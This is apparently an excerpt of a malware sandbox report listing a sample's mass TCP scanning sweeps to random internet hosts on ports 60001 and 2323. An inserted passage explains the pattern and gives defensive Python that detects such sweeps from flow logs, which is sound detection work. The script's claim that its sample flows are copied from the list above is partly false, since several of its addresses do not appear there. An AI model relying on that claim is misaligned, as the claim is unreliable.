    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 202.112.22.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 196.168.81.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 176.172.109.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 80.227.46.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 82.8.82.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 119.84.191.223:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 36.195.35.253:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 204.212.177.19:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 194.3.207.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 83.241.240.166:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 165.50.0.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 152.24.215.252:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.205.158.246:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 137.130.180.12:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 163.241.149.214:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 169.154.0.239:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 54.43.29.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 71.142.111.129:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 141.95.213.161:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 41.98.194.159:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 47.23.174.40:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 213.122.246.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 136.32.232.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 182.123.14.64:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 97.19.85.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 134.121.92.215:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 49.160.71.237:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 58.61.43.229:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 36.204.222.50:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 51.81.119.32:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 114.179.16.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 94.185.193.14:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.241.65.168:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.238.84.167:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 19.94.35.253:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 1.20.229.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 193.119.184.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 90.99.75.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 4.4.154.85:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 208.18.153.180:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 120.209.26.170:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 54.143.18.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 206.44.189.81:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 66.109.62.40:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.191.205.119:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 71.185.89.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 133.50.139.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 91.146.242.105:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 124.217.183.171:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 222.53.211.109:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 198.149.23.136:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 79.62.164.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 47.11.116.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.101.17.190:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 164.111.204.86:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 102.183.237.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 173.63.90.249:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 165.246.127.213:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.255.114.200:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 91.232.111.61:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 68.18.118.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 104.103.134.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.112.168.250:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 85.47.173.192:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 148.43.220.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 95.66.45.33:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 105.21.143.63:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 80.37.172.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 204.118.60.180:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.77.105.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 74.180.225.138:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 108.231.17.207:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 145.85.56.242:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 201.147.71.214:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.14.68.196:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 145.126.95.116:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 134.61.217.97:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 174.78.44.42:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 211.233.32.189:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 181.255.116.88:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 97.100.138.119:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 121.41.198.245:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 84.228.130.82:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 207.178.108.159:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 31.151.34.172:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 32.255.244.244:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 111.48.246.182:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 152.5.129.158:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 88.115.235.49:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 67.5.123.73:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 46.26.46.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 119.201.225.4:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 111.247.191.212:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 77.217.31.153:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.147.146.84:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 147.118.185.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 181.212.176.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 154.181.105.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 168.33.61.120:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.114.62.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 187.216.90.81:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 138.168.132.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 83.143.251.107:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 150.11.21.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 196.157.178.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 48.175.76.102:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 165.186.196.221:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 154.5.140.98:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 123.49.171.251:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 46.171.131.57:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 129.101.4.63:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 113.92.31.199:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 194.89.84.55:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 48.70.186.197:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 61.84.81.125:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 60.61.184.90:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 132.113.246.172:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 44.226.150.96:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 122.191.133.54:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 24.101.93.26:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 204.195.7.251:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62898 -> 124.197.251.240:2323
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 86.80.174.146:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 27.86.27.2:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 71.210.73.112:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 23.29.49.251:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 84.221.142.125:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 50.110.179.60:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 65.127.143.43:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 5.146.175.11:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 157.241.71.35:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 159.129.179.129:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 154.34.159.161:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 79.36.239.27:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 98.10.61.147:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 166.153.238.3:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 208.72.143.170:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 86.191.3.30:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 144.194.15.198:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 1.4.211.8:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 113.86.118.173:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 105.85.100.216:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 137.179.29.3:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 114.154.113.140:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 90.199.199.161:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 159.86.91.117:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 157.137.45.186:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 59.190.181.113:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 79.64.172.232:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 180.99.45.222:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 193.92.172.231:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 47.76.21.220:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 144.225.37.178:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 20.112.122.79:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 9.9.216.43:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 18.243.249.144:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 85.170.44.93:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 115.103.146.55:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 182.101.251.175:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 130.161.177.37:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 118.45.151.38:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 165.221.27.66:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 168.163.40.25:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 197.175.182.25:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 184.184.233.67:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 45.141.225.81:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 209.79.114.116:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 134.63.216.157:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 59.244.157.79:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 178.4.153.248:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 159.150.165.26:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 105.23.76.101:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 222.96.148.52:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 211.153.155.104:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 212.117.26.216:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 98.129.12.252:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 119.11.153.73:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 154.45.34.185:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 1.188.106.137:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 85.156.202.196:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 123.131.239.82:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 40.15.235.240:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 24.118.193.109:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 13.129.186.10:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 13.133.71.150:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 12.91.251.42:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 220.1.212.140:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 180.52.106.84:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 176.8.126.10:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 187.34.51.53:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 54.193.120.98:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 32.22.207.168:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 1.16.175.95:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 107.241.120.83:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 9.155.25.169:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 168.233.214.10:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 159.208.41.127:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 199.214.130.251:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 121.14.5.111:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 63.189.235.237:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 132.97.66.206:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 101.93.173.154:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 34.163.237.182:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 101.36.251.217:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 96.169.90.252:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 155.120.72.26:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 72.176.47.19:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 107.238.181.235:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 12.157.24.239:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 119.15.238.31:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 83.231.58.243:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 63.61.137.115:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 175.244.16.223:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 176.185.157.238:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 203.50.80.90:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 4.202.121.151:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 137.123.4.166:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 208.159.12.251:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 42.151.149.137:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 159.244.179.76:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 75.131.54.227:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 137.227.211.19:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 173.239.65.6:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 112.190.9.149:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 212.237.204.230:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 68.179.177.130:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 136.239.250.2:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 145.170.203.205:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 61.241.136.83:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 64.202.193.97:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 41.134.222.207:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 151.82.210.50:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 5.183.71.165:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 221.80.4.139:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 104.175.97.41:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 19.12.178.138:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 191.195.43.31:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 123.139.0.239:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 5.234.122.60:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 205.94.91.200:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 159.133.160.47:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 38.123.11.0:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 99.194.198.208:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 157.87.90.62:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 162.245.117.118:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 211.4.157.42:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 78.17.173.61:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 132.242.81.67:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 112.182.128.36:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 183.249.7.148:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 197.129.111.242:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 170.150.237.230:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 38.138.83.58:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 177.137.188.201:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 73.125.135.182:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 135.125.156.70:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 105.116.140.255:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 116.133.132.53:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 66.154.66.53:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 109.251.107.243:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 53.204.240.5:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 44.206.70.74:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 112.108.232.208:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 89.53.240.190:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 178.242.135.37:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 117.117.40.17:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 186.155.22.191:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 65.1.190.204:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 142.207.201.195:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 35.186.242.198:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 66.200.140.83:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 193.250.210.255:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 138.170.227.30:60001
    Source: global traffic | TCP traffic: 192.168.2.23:62642 -> 141.80.171.175:60001
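The evidence above has one source port (62642) reused against several hundred distinct hosts on TCP/60001, and a second fixed source port (62898) against TCP/2323. A connect()-based client gets a fresh ephemeral port per connection, so a single source port fanning out across the whole IPv4 space is the fingerprint of a raw-socket SYN sweep with generated target addresses; the report's separate "TCP traffic detected without corresponding DNS query" entries further down are the same behaviour seen from the DNS side. The following Python is added here as a worked detection and is not part of the Joe Sandbox report or of the sample: it parses evidence lines of this shape, groups them by (source IP, source port, destination port) to find the fan-out, measures how widely the targets scatter across /8 blocks, and lists public destinations that never appeared in a DNS answer. The sample lines, the TEST-NET HTTPS flows standing in for ordinary resolved traffic, and the thresholds are constructed for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample evidence in the shape the report uses ("src:port -> dst:port").
# The first five flows are copied from the sweep above; the TEST-NET (203.0.113.0/24)
# flows are made up to stand in for ordinary, DNS-resolved HTTPS traffic.
SAMPLE_FLOWS = """\
TCP traffic: 192.168.2.23:62642 -> 218.36.168.55:60001
TCP traffic: 192.168.2.23:62642 -> 98.104.186.240:60001
TCP traffic: 192.168.2.23:62642 -> 198.42.245.28:60001
TCP traffic: 192.168.2.23:62898 -> 165.186.196.221:2323
TCP traffic: 192.168.2.23:62898 -> 154.5.140.98:2323
TCP traffic: 192.168.2.23:35692 -> 203.0.113.10:443
TCP traffic: 192.168.2.23:35694 -> 203.0.113.10:443
"""

# Constructed: the addresses that DNS answers in the same capture returned.
SAMPLE_DNS_ANSWERS = {"203.0.113.10"}

FLOW_RE = re.compile(
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)"
)


def parse_flows(text):
    """Return (src, sport, dst, dport) tuples; lines without a flow are skipped."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.search(line)
        if m:
            flows.append((m["src"], int(m["sport"]), m["dst"], int(m["dport"])))
    return flows


def find_sweeps(flows, min_targets=50):
    """Group flows by (src, sport, dport). A kernel-assigned ephemeral port is
    used once, so one source port reaching many destinations on one service
    port means the sender is crafting SYNs itself."""
    targets = defaultdict(set)
    for src, sport, dst, dport in flows:
        targets[(src, sport, dport)].add(dst)
    return {key: sorted(dsts) for key, dsts in targets.items()
            if len(dsts) >= min_targets}


def first_octet_spread(addrs):
    """Distinct /8 prefixes among the targets: a randomly generated target list
    scatters across the whole IPv4 space, unlike a hard-coded C2 or one CDN."""
    return len({int(ipaddress.IPv4Address(a)) >> 24 for a in addrs})


def unresolved_destinations(flows, dns_answers):
    """Public destinations no DNS answer produced: generated scan targets or a
    hard-coded C2 address. Private and reserved ranges are ignored."""
    out = set()
    for _, _, dst, _ in flows:
        if dst not in dns_answers and ipaddress.IPv4Address(dst).is_global:
            out.add(dst)
    return sorted(out)


def report(text, dns_answers, min_targets=50):
    """Human-readable findings; the threshold is tuned per environment."""
    flows = parse_flows(text)
    findings = []
    for (src, sport, dport), dsts in find_sweeps(flows, min_targets).items():
        findings.append(
            f"sweep: {src}:{sport} -> {len(dsts)} hosts on tcp/{dport}, "
            f"{first_octet_spread(dsts)} distinct /8s")
    unresolved = unresolved_destinations(flows, dns_answers)
    if unresolved:
        findings.append(f"{len(unresolved)} destinations without a DNS answer")
    return findings


if __name__ == "__main__":
    # min_targets is lowered for the short constructed sample; against the full
    # evidence list above the default of 50 would fire on the 60001 sweep alone.
    for line in report(SAMPLE_FLOWS, SAMPLE_DNS_ANSWERS, min_targets=2):
        print(line)
```

Fed the complete evidence list from this report instead of the sample, the same grouping returns one key for port 62642 with several hundred targets spread over well over a hundred /8 blocks, and a second key for port 62898; the HTTPS flows, each on its own ephemeral port, never cluster. A zeek `conn.log` or a firewall export carries the same four fields, so the regex is the only part that needs adapting to a real data source.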
    Source: /lib/systemd/systemd-journald (PID: 5308) | Socket: <unknown socket type>:unknown
    Source: /usr/sbin/gdm3 (PID: 5502) | Socket: <unknown socket type>:unknown
    Source: /usr/bin/dbus-daemon (PID: 5531) | Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-journald (PID: 5571) | Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-journald (PID: 5675) | Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-journald (PID: 5772) | Socket: <unknown socket type>:unknown
    Source: /usr/sbin/gdm3 (PID: 5773) | Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd (PID: 5794) | Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-journald (PID: 5900) | Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-journald (PID: 6004) | Socket: <unknown socket type>:unknown
    Source: /usr/sbin/gdm3 (PID: 6006) | Socket: <unknown socket type>:unknown
    Source: unknown | Network traffic detected: HTTP traffic on port 35692 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 35694 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 35688 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 36462
    Source: unknown | Network traffic detected: HTTP traffic on port 35690 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 35688
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 35694
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 35692
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 35690
    Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 36462 -> 443
    Source: unknown | TCP traffic detected without corresponding DNS query: 42.235.62.146
    Source: unknown | TCP traffic detected without corresponding DNS query: 24.132.216.36
    Source: unknown | TCP traffic detected without corresponding DNS query: 165.46.148.41
    Source: unknown | TCP traffic detected without corresponding DNS query: 101.212.218.38
    Source: unknown | TCP traffic detected without corresponding DNS query: 196.168.81.36
    Source: unknown | TCP traffic detected without corresponding DNS query: 169.1.238.24
    Source: unknown | TCP traffic detected without corresponding DNS query: 20.250.201.41
    Source: unknown | TCP traffic detected without corresponding DNS query: 157.29.219.252
    Source: unknown | TCP traffic detected without corresponding DNS query: 202.87.60.165
    Source: unknown | TCP traffic detected without corresponding DNS query: 63.95.13.159
    Source: unknown | TCP traffic detected without corresponding DNS query: 167.80.156.118
    Source: unknown | TCP traffic detected without corresponding DNS query: 202.118.167.19
    Source: unknown | TCP traffic detected without corresponding DNS query: 217.0.244.101
    Source: unknown | TCP traffic detected without corresponding DNS query: 211.56.173.66
    Source: unknown | TCP traffic detected without corresponding DNS query: 211.174.85.183
    Source: unknown | TCP traffic detected without corresponding DNS query: 86.88.131.23
    Source: unknown | TCP traffic detected without corresponding DNS query: 165.97.105.164
    Source: unknown | TCP traffic detected without corresponding DNS query: 208.231.150.91
    Source: unknown | TCP traffic detected without corresponding DNS query: 54.70.177.31
    Source: unknown | TCP traffic detected without corresponding DNS query: 159.94.253.163
    Source: unknown | TCP traffic detected without corresponding DNS query: 73.57.74.130
    Source: unknown | TCP traffic detected without corresponding DNS query: 84.199.170.119
